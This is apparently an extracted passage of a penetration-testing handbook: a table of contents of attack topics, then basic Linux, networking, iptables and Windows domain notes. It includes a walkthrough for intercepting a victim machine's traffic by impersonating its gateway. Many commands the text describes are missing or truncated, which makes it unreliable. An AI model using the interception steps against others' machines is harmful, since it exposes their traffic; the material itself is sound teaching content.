of Contents
1. Introduction 1.1
2. The Basics 1.2
1. Linux 1.2.1
1. Basics of Linux
2. Bash-scripting
3. Vim
2. Windows 1.2.2
1. Basics of Windows
2. PowerShell
3. PowerShell Scripting
4. CMD
3. Scripting With Python 1.2.3
1. Python Fundamentals
2. Useful Scripts
4. Transferring Files 1.2.4
1. Transfering Files on Linux
2. Transfering files on Windows
5. Firewalls 1.2.5
6. General tips and tricks 1.2.6
7. Cryptography 1.2.7
3. Recon and Information Gathering Phase 1.3
1. Passive Information Gatherig 1.3.1
1. Identify IP-addresses and Subdomains
1. Identify IP-addresses
2. Find Subdomains
1. DNS Basics
2. Finding subdomains
3. DNS Zone Transfer Attack
2. Identifying People
3. Search Engine Discovery
4. Identifying Technology Stack
2. Active Information Gathering 1.3.2
1. Port Scanning
4. Vulnerability analysis 1.4
1. Non-HTTP Vulnerabilities 1.4.1
1. Common ports\/services and how to use them
2. Port Knocking
2. HTTP - Web Vulnerabilities 1.4.2
1. Common Web-services
2. Authentication
1. OAuth
3. Session Management
1. Ses
4. Broken Authentication or Session Management
5. Session Fixation
6. WAF - Web Application Firewall
7. Attacking the System
1. Local File Inclusion
2. Remote File Inclusion
3. Directory Traversal Attack
4. Hidden Files and Directories
5. SQL-Injections
6. Nosql-Injections
7. XML External Entity Attack
8. Bypass File Upload Filtering
9. Exposed Version Control
10. Directory Traversal Attack
11. Host Header Attack
12. Deserialization attacks
3. Attacking the User 1.4.3
1. Clickjacking
2. Text/content-injection
3. HTML-Injection
4. Insecure Direct Object Reference (IDOR)
5. Subdomain Takeover
6. Cross Site Request Forgery
7. Cross-Site Scripting
1. Examples
2. DOM-based XSS
8. Browser Vulnerabilities
9. HTML-Injection
4. Automated Vulnerability Scanners 1.4.4
5. Exploiting 1.5
1. Social Engineering - Phishing 1.5.1
2. Default Layout of Apache on Different Versions 1.5.2
3. Shells 1.5.3
4. Webshell 1.5.4
5. Generate Shellcode 1.5.5
6. Editing Exploits 1.5.6
7. Compiling windows exploits 1.5.7
6. Post Exploitation 1.6
1. Spawning Shells 1.6.1
2. Meterpreter for Post-Exploitation 1.6.2
3. Privilege Escalation - Linux 1.6.3
4. Privilege Escalation - Windows 1.6.4
5. Privilege Escalation - Powershell 1.6.5
6. Escaping Restricted Shell 1.6.6
7. Bypassing antivirus 1.6.7
8. Loot and Enumerate 1.6.8
1. Loot Windows
2. Loot Linux
9. Persistence 1.6.9
10. Cover your tracks 1.6.10
7. Password Cracking 1.7
1. Generate Custom Wordlist 1.7.1
2. Offline Password Cracking 1.7.2
3. Online Password Cracking 1.7.3
4. Pass the Hash - Reusing Hashes 1.7.4
8. Pivoting - Port forwarding - Tunneling 1.8
9. Network traffic analysis 1.9
1. Arp-spoofing 1.9.1
1. SSL-strip
2. DNS-spoofing 1.9.2
3. Wireshark 1.9.3
10. Wifi 1.10
1. WEP 1.10.1
2. WPS 1.10.2
11. Physical access to machine 1.11
12. Literature 1.12
My notepad about stuff related to IT-security, and specifically penetration testing. Stuff I have come
across that I don't feel like googeling again.
I have used this book to try to write down how some things work, but at the same time I want to use it
as a reference book to find commands and things I just can't remember. Therefore I have tried to
create a TLDR section in the beginning of some chapters where I have copy-paste ready commands
that are useful. And if you want to know more you can continue to read the rest of the chapter. This is
my way of making the book a hybrid between the Red Team Field Manual and a standard introduction
book to pentesting.
Also, this book is just a collection of stuff that is available on the interwebz. I am just a simple
collector. I have tried to include a reference section to show where I found the technique. This book is
my way of trying to give something back to the infosec community and I hope it can be useful to
You can read this book on If you feel like contributing, or
just forking it, you can do that from its github repo here: If you feel
like this is a good start, but you want to add and remove things and just make it yours you can just
fork it and do whatever you want with it. sql-injection
Sometimes the line isn't very clear between the chapters. Some actions might be considered part of
the vulnerability analysis-phase, but it could also but considered part of the recon-phase. It is what it
These chapters are written sporadically with a lot of stuff missing. I just add stuff wherever whenever.
Also, things might not be accurate, I might have misunderstood something or misused a tool. So don't
trust me or this book for any accuracy.
The Basics
The Basics
The Basics
In this chapter we will look at some basics, good stuff to know before we begin. The basics of how
Windows work and the basics of Linux.
It is also pretty useful to know how to cook together a simple bash-script, so we are going to look at
some really simple bash operations.
And a little bit about PowerShell, and the windows command line. PowerShell is becomming more
and more important as a tool for hackers. So this chapters will probably keep expanding.
Python is also the hackers friend, so I have included a little bit about some basic operations with
Transferring files is also pretty fundamental. It could be placed in the post-exploit chapter, but I think
it fits better here since it is necessary for any work between different machines.
Vim is another thing that you can't live without. So can use it as your main editor for writing and
editing code or notes, but even if you don't use it as your main editor you still need to know the basics
of it in order to be able to edit files on your hacked machines.
Linux was first released in September 17, 1991 by Linus Torvalds. Strictly speaking Linux is just the
kernel in the GNU/Linux operating system. Linux is the most installed OS in the world, that is mainly
due to the fact that android use Linux as its OS. It is leading in pretty much all markets except for the
From a infosec perspective there are two reasons we should learn Linux. The first is that the majority
of all servers in the world is running on Linux. And if we want to hack those servers we of course
have to understand how they work. The second reason is that the vast majority of all hacking-tools are
only available on Linux.
So in this chapter we are going to look at bit at some basic commands and basics of Linux. Of course
your can write quite a few books about Linux, so this tiny little introduction is just way to get you
started. And also, I am just a beginner myself so I am just writing stuff that I myself need to learn.
Although there is only one Linux Kernel there are many Linux Distributions, that is: different
versions. That is because the GNU/Linux OS is a mix of GNU software and the Linux Kernel. The
GNU/Linux OS can be packaged in a million different ways, with different software preinstalled, with
different configurations, with different Graphical User Interface (GUI). The fact that you can
configure the OS however you like has given rise to the many different versions. These different
versions are usually called distros. There are hundreds of different distros. Some common ones are:
Ubuntu, Debian, Redhat, CentOS and Arch.
So you probably wonder what the main differences are. Here is a list of some differences:
So as you can see depending on the users needs you can choose the distro that fits you best. Some
people want to have bleeding-edge (the latest updates - although a bit more unstable) and others
prefer stability. Some people want a distro with higher degree of security. Others want a distro with
only free software, others want distros specially made for kids, or for education, or for scientists. One
distro that is common among pentesters is Kali Linux. It comes preinstalled with hundreds of
different pentesting-related tools. It might not be the best distro for everyday use. But for pentesting is
is really convenient. Of course you could just download the programs to your non-kali distro as you
go along. But it might be just an unneccesary hassle for you.
Basics of Linux
Basics of Linux
Basics of linux
This is a huge chapter. I could divide it up in many subchapters but I like to have it all at one place so
I can just do ctr-f, and search for whatever I am looking for.
One really useful trick when working with bash is to search for old commands that you have used.
You can access this search function by doing ctr-r in the terminal.
cd - Change directory
Looking at files
file - Show info about file. What type of file it is. If it is a binary or text file for example.
less - Output file but just little bit at a time. Use this one. Not more.
Use /searchterm to search. It is the same command as in vim. n to scroll to next search result.
Press q to quit.
more - Output file but just little bit at a time. less is better.
cp - Copy
Basics of Linux
rm - Remove file
sudo -l
Finding files
There are mainly three ways to find files on Linux: find, locate, and which.
Find is slower than locate but a lot more thorough. You can search for files recursively and with regex
and a lot of other features.
Locate is really fast because it relies on an internal database. So in order to have it updated you need
to run:
sudo updatedb
locate filename
Outputs the path of the binary that you are looking for. It searches through the directories that are
Basics of Linux
which bash
# Usually outputs: /bin/bash
If you want to create a new command from other commands, and be able to invoke that command
from your terminal, there are a few different way of doing that.
One way is write a bash-script, and then move that script to one of your folders in your $PATH
The other way is to simply write a function in your .bashrc file. You can then invoke that function
from anywhere in your terminal.
So for example, if you want to ssh into a machine, but you are tired of having to write the whole
command, you can just add this function in your .basrhrc file:
function connecttossh {
ssh user@
Then you need to source the file, so that it becomes updated: source ./.bashrc
Now you can just writeconnecttossh and the function will be executed.
2. Editing text
First let's just clear out something about standard streams, or I/O-streams. Standard streams are the
streams that are used to interact between the human computer-user and the machine. There are three
standard streams: standard input (stdin), standard output (stdout), and standard error (stderr).The stdin
stream can be seen as an abstractions of the real keyboard input. So when you issue a
command/program that requires input the program does not read straight from the keyboard input,
instead it reads from the file STDIN.
Stdin is the data that gets inputed into the program. An example of a program that requires stdin data
is cp. In order for the program to do anything it needs input data. For example cp file1
copy_of_file1. Here file1 and copy_of_file1 is the stdin.
So the default Stdin comes from the STDIN-file that is a text-file representation of the keyboard
input. But often times we do not want to input stuff from the keyboard, sometimes we want to input
something into a program that comes from another file. That is when we can use redirection symbol:
So an example could be cat < my_text_file.txt. The data from my_text_file.txt will now be
used as input instead of the keyboard input.
Basics of Linux
The stdout can be redirected to another file by using these symbols > and >>. So now we can do the
ls > result_of_ls.txt
# now the result will be written to the file result_of_ls.txt
ls >> result_of_ls.txt
# This will append the data to the bottom of the file result_of_ls.txt
Another incredibly useful feature is the pipe feature, reprsented with this symbol |. It will take the
stdout and redirect it into another program. Here is an example:
ls -la | less
This will take the stdout from ls -la and forward/redirect it into the less program. Using the
pipe you can now chain different commands.
Stderr is the stream used for outputting error messages. So if a program fails for whatever reason. For
example, if we try to copy a file that does not exist, this will be the stdrr output:
cp thisfiledoesnotexist aaaaaaaaaa
cp: cannot stat 'thisfiledoesnotexist': No such file or directory
This is a common way for stderr to present itself, just straight out into the terminal. But sometimes
stderr gets sent to a log file.
Stderr is useful because with it we can separate between stdout and stderr. However, to the eye it
might be difficult to distinguish what output is stdout and what output is stderr.
One easy way to determine is the output is stderr or stdout is to simply redirect it into a file. Because
by default you only redirect stdout, and not stderr.
There are certain programs that are especially useful to use together with pipes. They can also be used
as stand-alone programs but you will often see them together with pipes.
sort test.txt
Basics of Linux
sort -u test.txt
sort test.txt | uniq
cat filename | sort -u > newFileName
Editing text
sed "1d"
Cut by column
Let's say that we have the following text, and we want to cut out the ip-address.
tr - Translate
Remove character
# Remove characters
cat file.txt | tr -d "."
Basics of Linux
So awk is an advanced tool for editing text-files. It is its own programming language to it can become
quite complex. Awk iterates over the whole file line by line.
Now we want to print out the fourth column of that file, we can just pipe this to cut, but we can also
use awk for it, like this:
So if you are manipulating some text you might want to start the output with some info about the
columns or something like that. To do that we can use the BEGIN-keyword.
awk 'BEGIN {printf "IP-address \tPort\n"} /nop/ {print $3}' test.txt | head
awk 'BEGIN{printf "IP-address \tPort\n"} /nop/ {print $3} END {printf "End of
Here we are printing IP-address PORT to the first line of the file.
3. User management
There are two commands to add a user in linux: adduser or useradd. adduseris a perl-script that
facilitate the process, and useradd is the native linux binary.
adduser NameOfUser
useradd nameOfUser
Basics of Linux
On some machines we might not be able to edit the sudoers file because we don't have an interactive
shell, in this case can you can just redirect the text into the file, like this:
su NameOfUser
Remove/delete user:
4. Permissions
ls -la
Shows all the files and directories and their permission settings.
Here we have 10 letters in the beginning. The first one d shows that it is a directory.
The next three letters are for read, w for write and x for execute. The first three belong to the owner,
the second three to the group, and the last three to all users.
5. Processes
To display information regarding the systems processes you can use the ps command.
ps -aux
If you run this command you will probably see a pretty big output. In the column for command you
will see what command has been run. Every process has a Process Identification Number (PID).
Something you will also see in the output.
All of theses processes can actually be found in /proc. You just go to /proc/[pid]. In /proc
you can find information about the system, and you can actually change the system if you change
those files! But more on that later. What I wanted to explain is that if we look at the output from ps
we see that some commands are in brackets. Like this:
Basics of Linux
Those are usually kernel processes, and you can safely assume that no user has started them.
If you want to monitor processes in real time you can use top or htop. top comes preinstalled on
most distros. But htop is really a lot nicer.
For htop the F1-10 keys might trigger OS-events. So you can use the shortcuts instead.
6. Packages
Something that difference Linux from windows is how it handles installing new software. In windows
you usually have to google around and then click on random scary download buttons that might fuck
up your computer, or not. It's like a constant lottery where you win by no installing malware. In Linux
that is usually not really an issue. That is because distros have their own software repositories from
where you can download your software. This is kind of like an app-store except everything is free.
The different major branches of teh GNU/Linux OS have their own software repositories. Ubuntu has
their own, debian has their own, and so on.
Different distros also have their own package-amangers. For example, Debian and ubuntu uses apt,
while Redhat uses rpm, and Arch uses pacman. You should strick to your own package-manager,
because even though chaning package-manager is possible it will probably just cause you more
headache than benefits.
Install package
If you only have a .deb file you do this to install from the terminal:
Remove packages
Basics of Linux
dpkg --list
When you remove some package it might have requires some other dependencies. To remove those
you run
You can define your path in /etc/environment. If you don't have it you can create it and add the
path like this:
If you are using zsh (which you should) you have to add it here
source /etc/environment
Adding a path
This is a non-persistent way to add binaries to your path. Might be useful if you have entered a system
that has limited binaries in the path.
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
If you download a package that is not in the official repository you can put the binary in /opt. That
is good place to put your binaries.
Now you need to add that path to your path-variable. Remember how we set that in
/etc/environment. So now open up that file and add /opt to it, so i looks like this.
I always add custom binaries last. That means that if we have two binaries with the same name the
machine will first select the original binary. This way you won't have to fear screwing up, by
accidentally creating a new ls binary for example.
7. Cronjobs
There are two ways to configure cronjobs. The first one is by putting scripts in the following folders.
Basics of Linux
# list cronjobs
crontab -l
8. Devices/disks/partitions
First some terminology. A driveis a physical storage device, just as a hard disk, solid state drive, or
usb. In Linux these drives are represented as special file system objects called "device". They are
found under /dev.A physical storage unit, a drive, can be divided up in to multiple logical storage
units, these are called partitions. So they are just digital divisions of the drive. In linux a device
are often named something like sda, sdb, sdc. And the partions of those devices are numbered. So one
partion might be called sda1, and another sda2. These can then be found under /dev/sda1 and
You can view the devices and their partions with the command lsblk
Formating disks
To format disks we are going to use the program parted. It can be used with its own shell or by
running commands. So you can just run parted, and you will enter the parted interface. But here we
are going to run the commands instead.
# Make sure you know which device you are working with, they can change name b
Partition standard
First we have to choose a partition standard. The modern and mostly used is gpt, and older is msdos.
This command creates a new partition (mkpart), which is of type primary, that takes up the space
between 0-100%. Which means we will only have one partition.
Basics of Linux
Now that we have a partition we need to add a filesystem to it.There are many different types of
filesystems. ext4 is common for linux. While windows uses NTFS, and mac uses HFS Plus. exFAT
can be understood by all three OS:s, something that might be useful to USB:s.
# For linux
sudo mkfs.ext4 /dev/sda1
# Supposedly work on linux, mac and windows. But fails for me on my tests on M
sudo mkfs.vfat /dev/sda1
# To use UDF (universal disk format) that should also work on all OS
# You first need to install apt-get install udftools. Then you do:
mkudffs /dev/sda1
Remove partition
Mount it
Now you can just mount the parition somewhere on your filesystem
# Mount it
sudo mkdir /mnt/here
sudo mount /dev/sda1 /mnt/here
# Unmount it
sudo umount /mnt/here
fdisk -l
Encrypt a partition
# In type you will see "crypt"
There are eight slots for passphrases. You can view these slots like this:
Basics of Linux
Add a key:
Remove a key:
Formatting a USB
If you have stored sensitive information, or otherwise want to make sure that it is not possible to read
removed files from the USB you can overwrite the usb (or any other kind of disk) with zeroes, or just
random data. So we can start by doing that, however, first we need to know the device name of the
First find out the name of the usb/device. We can to that by looking at the dmesg or tail -f
var/log/syslog when we insert the usb. Another way is to run the command lsblk before and
after inserting the USB. In my case the usb was called sda,, but for you it might be something else.
Make sure you know exactly which device you are working with, otherwise you will completely
detroythe wrong device. Then we need to unmount the usb.
Now we are ready to overwrite it with zeroes. It can be done like this:
ext4 works well with linux, vfat and ntfs should work with windows.
First find out the name of the device. Using dmesg, or lsblk, or something similar.
That's it.
9. The Filesystem
The Filesystem Hierarchy Standard
Basics of Linux
sbin is system binaries. A normal user do not have access to these binaries. It is only root and users
with sudo privileges that do.
ls -la /sbin
total 5884
drwxr-xr-x 2 root root 4096 2012-02-04 10:01 .
drwxr-xr-x 21 root root 4096 2012-02-06 18:41 ..
-rwxr-xr-x 3 root root 23840 2008-03-27 13:25 findfs
-rwxr-xr-x 1 root root 20020 2008-03-27 13:25 fsck
-rwxr-xr-x 1 root root 15168 2008-09-26 08:43 getty
-rwxr-xr-x 1 root root 375 2009-12-10 10:55 grub-install
lrwxrwxrwx 1 root root 6 2012-02-04 09:51 halt -> reboot
-rwxr-xr-x 1 root root 69228 2008-03-28 18:26 hdparm
-rwxr-xr-x 1 root root 31620 2008-09-26 08:43 hwclock
-rwxr-xr-x 1 root root 61808 2007-12-13 05:51 ifconfig
-rwxr-xr-x 2 root root 27372 2007-09-19 20:25 ifdown
-rwxr-xr-x 2 root root 27372 2007-09-19 20:25 ifup
-rwxr-xr-x 1 root root 89604 2008-04-11 09:50 init
-rwxr-xr-x 1 root root 47448 2008-01-28 08:49 ip6tables
-rwxr-xr-x 1 root root 51680 2008-01-28 08:49 ip6tables-restore
-rwxr-xr-x 1 root root 51644 2008-01-28 08:49 ip6tables-save
-rwxr-xr-x 1 root root 10948 2007-12-13 05:51 ipmaddr
-rwxr-xr-x 1 root root 47480 2008-01-28 08:49 iptables
So if you want to connect a CD-rom or USB to your machine. You need to mount it to a specific path
on the filesystem.
So if you plug in the usb it might be accessible at /dev/usb. But that it not enough for you to be able
to browse the usb content. You need to mount it. You do this by writing
So when you click on Eject or Safetly remove you are just unmounting.
umount /media/usb
Knowing how to mount and unmount might be useful if you want to get access to a remote NFS-
directory. You will need to mount it to your filesystem to be able to browse it.
It is possible that the disk is not known as /dev/usb. If that is the case you can run
sudo fdisk -l
And see if you can find your device, and look for the address. Then you mount it like this (or with the
Basics of Linux
correct path)
Mount crypto-volume
In some cases it might be useful to create your own disk. Maybe for attaching to a virtual machine, or
maybe to facilitate a backup. It is just a easy nice little container to have. It just requires two easy
mkfs.ext4 ./nameOfFile
Systemctl can be used to enable and disable various services on your linux machine.
Start ssh
You can verify that the service is listening for connection by running network status.
netstat -apnt
/etc/init.d/cron status
Basics of Linux
/etc/init.d/cron start
/etc/init.d/cron stop
This is a tool to control services more easily, what is running upon boot and so on.
11. Kernel
The Kernel is responsible for talking between the hardware and the software, and to manage the
systems resources.
The Linux Kernel is a monolithic kernel, unlike the OSX and the Windows kernels which are hybrid.
You can find the kernel file in /boot. It might look like something like thisvmlinuz-4.4.0-57-
generic. In the beginning of time the kernel was simply called linux. But when Virtual Memory
was introduced they changed the name to vmlinux to reflect that the kernel could handle virtual
memory. When the kernel later became too big it was compressed using zlib , therefore the name was
changed to vmlinuz.
The Linux Kernel differs from Windows in that it contains drivers by default. So you don't have to go
around looking for drivers like you do on windows when you want to install a printer, or something
like that.
It is really easy to upgrade to the latest Linux kernel, all you have to do tis this:
If you are using a distro that is Long Term Supported (LTS). You will not get the latest Kernel
version, but you will get the latest Long Term Supported version.
14. Logging
Logs can be viewed here on debian distros /var/log/
# Stop NetworkManager
sudo systemctl stop NetworkManager.service
# Start NetworkManager
sudo systemctl start NetworkManager.service
Network cards (NIC) are identified by their mac address, hosts by theirip address andapplications by
their port number.
# Configuration files
# Tools
ip route
ifup eth0
ifdown eth0
Basics of Linux
# You can also use ifconfig to bring an interface up and down. The difference
# will use the current configuration, and not take into account changes from /
# So use ifup and ifdown!
ifconfig eth0 up
ifconfig eth0 down
If you want to configure an interface only temporarly you can use ipand ifconfig. The changes
will not survive a reboot.
Ifconfig is old and deprecated on some systems. So use ip instead. But they do basically the
same thing.
Where packets are send in a network depends on the routing of the routing. Every node that the
packet passes in its travel to its destination has a routing table defined, that says where the packet
should be directed next. The most simple example is how the traffic of a home network is sent to the
router, and then from there forwarded on to somewhere else on the internet. How every host should
forward the packets are defined in the linux kernel routing table. You can see the routing table by
running this command:
ip route
netstat -r
I think that the most useful of these commands is route, since it includes the column names of the
table. Here is an example of the output:
So let's image that we don't have any routing rules at all. It is completely empty. Like this:
But we have network interface connected, called eth0. If we now try to ping the router (the gateway)
on the network, we get this result:
~ ping
connect: Network is unreachable
At this point we can't even add a route to the gateway. Because the network is unreacheable. So we
need to hook outselfs up to the network first.
We still can't ping anything out in the internetz- That's because we are not reaching our gateway
(router), since we haven't configured it yet.
It is often useful to man in the middle all traffic from a machine, to see what requests and stuff it does.
Let's say that the scenario is that the victim-machine is connected to the mitm-machine by ethernet
cable. This can be either a physical cable or thought a virtual machine.
Victim machine
auto lo
iface lo inet loopback
root@deb64:~# ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group defa
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens3: <BROADCAST,MULTICAST> mtu 1500 qdisc pfifo_fast state DOWN group defa
link/ether 52:54:00:a9:fc:4a brd ff:ff:ff:ff:ff:ff
So our network interface ens3 does not have an ip-address and it is down. So let's first give it an ip-
address, now remember that this ip-address will only be temporary, and will disappear on next reboot.
If you want to make it permanent you need to define it in /etc/network/interface
When we bring up the interface the routing table will automatically get populated.
root@deb64:~# ip r dev ens3 proto kernel scope link src
But we are still not able to reach the internet since we have not defined a default gateway yet. So let's
do that.
If we look at the routing table now we can see our new default gateway.
root@deb64:~# ip route
default via dev ens3 dev ens3 proto kernel scope link src
Attacking machine
First we need to give our machine the ip-address of the default gateway, so that the victim will
connect to the attacking machine.
This is all we have to do. If we now do a curl from our victim machine, we can
see the traffic flying by with tcpdump in our attacker-machine.
However, we might want to inspect the traffic in burp-suite, or some other proxy tool. In ordet to do
that we can redirect specific traffic into our proxy with the help of our friend iptables.
Go to Proxy > Options > Proxy Listeners > Edit > Binding > All
Go to: Proxy > Options > Proxy Listeners > Edit > Request handling >
Support invisible proxy
If you want to mitm windowsyou just need to change the ip and gateway to and
Basics of Linux
Wireless - wpa_supplicant
So if you manage to disable networkManager you can connect to a wireless network using
wpa_supplicant instead. I think that is what NetworkManager actually uses underneith.
Then we need to create a config-file for our specific access-point. We can do that with
wpa_passphrase, after running the command we are asked to write the password, which also gets
stored in the config file. In plaintext.
After this you do not have an IP-address, or you might not have a updated dhcp lease. So first you
need to release the current lease.
$ netstat -antlp
Proto Recv-Q Send-Q Local Address Foreign Address State
tcp 0 0 mymachine:domain *:* LISTEN
tcp 0 0 localhost:ipp *:* LISTEN
tcp 0 0 localhost:27017 *:* LISTEN
tcp 0 0 localhost:mysql *:* LISTEN
tcp 0 0 ec2-54-85-27-14.c:https ESTABLISHE
tcp 0 0 ec2-50-16-193-3.c:https ESTABLISHE
tcp 0 0 TIME_WAIT
tcp 0 0 localhost:27017 localhost:44196 ESTABLISHE
tcp 0 0 a104-114-242-25.d:https ESTABLISHE
tcp 0 0 localhost:44196 localhost:27017 ESTABLISHE
tcp 0 0 cb-in-f101.1e100.:https ESTABLISHE
tcp 0 1 LAST_ACK
udp 0 0 *:35733 *:*
Basics of Linux
A few interesting things to observe here is that my machine is using any port over 1024 to connect to
the outside. So it is not like just because we communicate with https and connect to port 443 that we
use that port on our machine. On our machine it can be any port (over 1024) and usually any port over
Find out what services are listening for connection on your machine
-a # All
-n # show numeric addresses
-p # show port
-t # tcp
netstat -anpt
To easily check out what process is using lots of bandwidth you can use nethogs.
Every listening process of course has a PID, but unless you are root you can't might not see them all.
Firewall - Iptables
Iptables is a firewall tool in linux. A firewall is basically a tool that scans incoming and/or outgoing
traffic. You can add rules to the iptables to filter for certain traffic.
Types of chains
So you can filter traffic in three different ways input, forward, and output. These are called three
different chains.
This is for incoming connections. If someone wants to ssh into your machine. Or a web-server
responds to your request.
This chain is used for traffic that is not aimed at your machine. A router for example usually just
passes information on. Most connections are just passing through. As you can see this will probably
not be used so much on your machine, as a normal desktop or a server doesn't router that much traffic.
Active rules
iptables -L
# It will output something like this
So as we can see the current policy is to accept all traffic in all directions.
If you for some reason has been tampering with the iptables and maybe fucked up. This is how you
return it to the default setting, accepting all connections
Okay, so let's block out some connections. To do that we want to add/append a new rule. We want to
block all connections from our enemy
iptables -L
To add line-numbers for each rule, so that you can then specify which rule you want to reset or
change or something you can output the rluels with line-numbers
iptables -L -v --line-numbers
Remove/delete a rule
To remove a rule you just do
Basics of Linux
sudo /sbin/iptables-save
There are a few different tools in hour arsenal that we can use to measure bandwidth usage. We will
start with iptables.
To view the input and output traffic we just list the rules with some verbosity.
iptables -L -v
# Stdout
Chain INPUT (policy ACCEPT 6382 packets, 1900K bytes)
pkts bytes target prot opt in out source destinatio
So now we just need to add our rules. A simple script for this would be
iptables -F
iptables -I INPUT 1 -p tcp -j ACCEPT
iptables -L -v --line-numbers
Basics of Linux
I have had problems with the network-adapter not starting or something like that, on Ubuntu. You can
try to restart the network manager if this happens:
Magical rfkill
If for some reason the wifi is blocked you can unblock it (or block it) with rfkill.
$ rfkill list
0: phy0: Wireless LAN
Soft blocked: no
Hard blocked: no
2: hci0: Bluetooth
Soft blocked: no
Hard blocked: no
To block or unblock the phy0 from the example above you do:
# Block
rfkill block 0
# Unblock
rfkill unblock 0
If there is a hard block it means that there is a physical switch on you machine that you need to
switch off.
Another rather messy area is DNS. The reason for this is that we have a few different players here,
/etc/resolv.conf, resolvconf, dnsmasq and the dreaded NetworkManager.
# There can't be any space between the variable name and the equal sign. It ha
battery_time=$(cat /sys/class/power_supply/BAT0/capacity)
while read p; do
echo $p
done <file.txt
Another way to write this is by using the program seq. Seq is pretty much like range() in python.
So it can be used like this:
If statement
function myfunction {
echo "hello world"
Daemonize an execution
If you do a ping-sweep with host the command will take about a second to complete. And if you run
that against 255 hosts I will take a long time to complete. To avoid this we can just deamonize every
execution to make it faster. We use the & to daemonize it.
I search for a file, find three, and take the last line, which is a path. Now I want to cat that path:
And also this classic answer:
Core concepts
In vim you have the concept of buffers.
# List buffers
# Switch buffer
# By number
# By name
b [name]
# Close/delete a buffer
start of line
0 (zero)
end of line
start of file
end of file
Operators are commands that do things. Like delete, change or copy.
c - change
ce - change until end of the word.
c$ - change until end of line.
dw - delete word
d$ - delete to the end of the line
Count - Numbers
You can add numbers before motion commands. To move faster.
If you need to replace a character, there is no need to enter insert-mode. You can just use replace
Go to a character and the press r followed by the character you want instead.
In order to copy something FROM vim to the OS-clipboard you can do this:
The " means that we are not entering a registry. And the * means the OS-clipboard. So we are
yanking something and putting it in the OS-clipboard registry.
Entering insert-mode
i - current character
o - next line
O - line before
a - end of word
A - end of line
Here is all your vim-configuration.
Install vundle here
Add plugin
Add plugin to your .vimrc-file and then open vim and write
Whether you like it or not Windows is the most common OS for desktop users in the world. So for a
pentester it is fundamental to understand the ins and outs of it.
So this chapter will contain some basics about Windows and windows networks.
We will also look a bit at PowerShell and of course the good old CMD.
Basics of Windows
Basics of Windows
Basics of windows
Versions of Windows
Due to Windows irregular way of naming their operating systems it can be a bit hard to keep track on.
So here is a list of the desktop OS, and then a list of Servers.
Windows desktops OS
Windows Server
Windows Networks
There are mainly two ways to structure a Windows network. One is using a server-client model called
Domain and the other is through a peer-to-peer like model called Worksgroup.
Windows domain
So when you log in to your machine it authenticates against the domain controller. This way it is
ultimately the domain controller that decides security policy. Length of password, how often it should
be changed, disabling accounts. If a users quits his/hers job you can just remove his/her account. The
person in control over the domain controller is in control of the network. As a pentester you are most
likely very interesting in gaining access the the domain controller with Administrator-privileges. That
means you control the network.
Since you authenticate against a domain controller you can log in to your account from any of the
machines in the network. Think of systems you have had in schools and universities, where you can
just sit down by any computer and log in to your account. This is usually a domain type network.
In order to set up a Domain network you need at least one Windows server for the domain controller.
If you have hacked a machine and you want to know if it is part of either a Workgroup or a domain
you can do the following: go to Control panel/System. If it says Workgroup:
something it means that the machine is connected to a workgroup, and not a domain.
Active directory
From Windows 2000 and on the application Active directory has been program used for maintaining
the central database of users and configurations.
Domain controller
Any windows computer can be configured to be a domain controller. The domain controller manages
all the security aspects of the interaction between user and domain. There are usually a least two
computers configured to be domain-controllers. In case one breaks down.
If you have compromised a machine that belong to a domain you can check if it has any users. DC:s
don't have local users.
If you run enum4linux you can look out for this section
Nbtstat Information
Basics of Windows
echo %logonserver%
On networks that are based on Linux and you need to integrate a windows machine you can use SMB
to do that.
Kerberos is a network authentication protocol. The original protocol is used by many unix-systems.
Windows have their own version of the Kerberos protocol, so that it works with their NT-kernel. It is
used by windows Domains to authenticate users. But kerberos can also be found in several unix-
operating systems. Kerberos was not built by windows, but long before.
I think a machine that has port 88 open (the default kerberos port) can be assumed to be a Domain
When a user logs in to the domain Active Directory uses Kerberos to authenticate the user. When the
user insert her password it gets one-way encrypted and sent with Kerberos to the Active directory,
which then compares it with its password database. The Key Distribution Center responds with a TGI
ticket to the user machine.
A workgroup architecture stands in contrast to the domain-system. A workgroup is based on the idea
of peer-to-peer and not server-client as domain is. In a domain network you have a server (domain
controller) and a client (the user). Therefore it might be a bit hard to control a network bigger than a
dozen clients. So it is usually used for smaller networks. If a computer is part of a workgroup it
cannot be part of a domain. In a workgroup architecture each computer is in charge of its own security
settings. So there is no single computer in charge of all the security settings for the workgroup. This is
good because you don't have one single point of failure, bt is also bad because you have to trust the
users to configure their machines securely.
In a network you can have several workgroups. But that is usually not the case.
User privileges
How does the user-system work on windows.
System (user)
System is actually not a user per se. System is technically a security principle. One big difference
between System and Administrator is that is the computer is connected to a domain the system user
can access the domain in the context of the domain account. The administrator cannot.
One example of this is the SAM key, which contains local account information. The System user has
Basics of Windows
Administrator is a default account on Windows. It is the user with the highest privileges.
Normal user
The normal user obviously have less privileges than the Administrator.
You can add a new user through the cmd with the following command:
Structure of windows
Windows 7
You often hear talk about the registry when talking about Windows. But what is really the registry?
Well the windows registry is a hierarchical database that stores low-level settings used by the OS or
any other application that uses it. The SAM (Security account manager) uses it, along with a lot of
other stuff.
There is not really any equivalent for the Registry in Linux. Most configurations are done in text-files
in Linux.You can usually find the under /etc.
In Linux you usually just sudo-edit a config-file in /etc. In Windows you open Regedit and you can
see the whole hierarchy. The registry is built with Key-value pairs.
Basics of Windows
You hear a lot of talk about drivers in the Windows ecosystem, but not in Linux. That is because in
Linux the drivers are open-sourced and included in the kernel, for most part. These drivers might be
produced by nice programmers or they could be developed by the hardware-producer themselves.
That's why it is so easy and fast to install new hardware on Linux. If it is compatible that is. Drivers
are software lets the OS communicate with the hardware. Like networks cards, graphics card, printers.
To list all the drivers on the machine use the following command:
This can we good to know since drivers can contains vulnerabilities that can be used for priv-esc.
Check out the chapter on that.
The software is usually includede in most Windows versions, except for the home editions. The IIS
version usually corresponds to the OS version. There is a new IIS version for every new OS, in
By default IIS 5.1 and earlier run websites in a single process running the context of the System
Activ server pages is the scripting environment for IIS. ASP render the content on the server side. The
scripting languages that are supported are: VBScript, JScript and PerlScript.
File types
In windows file-ending are important.
In order to write a batch-script you open up an editor and then just write your commands. And then
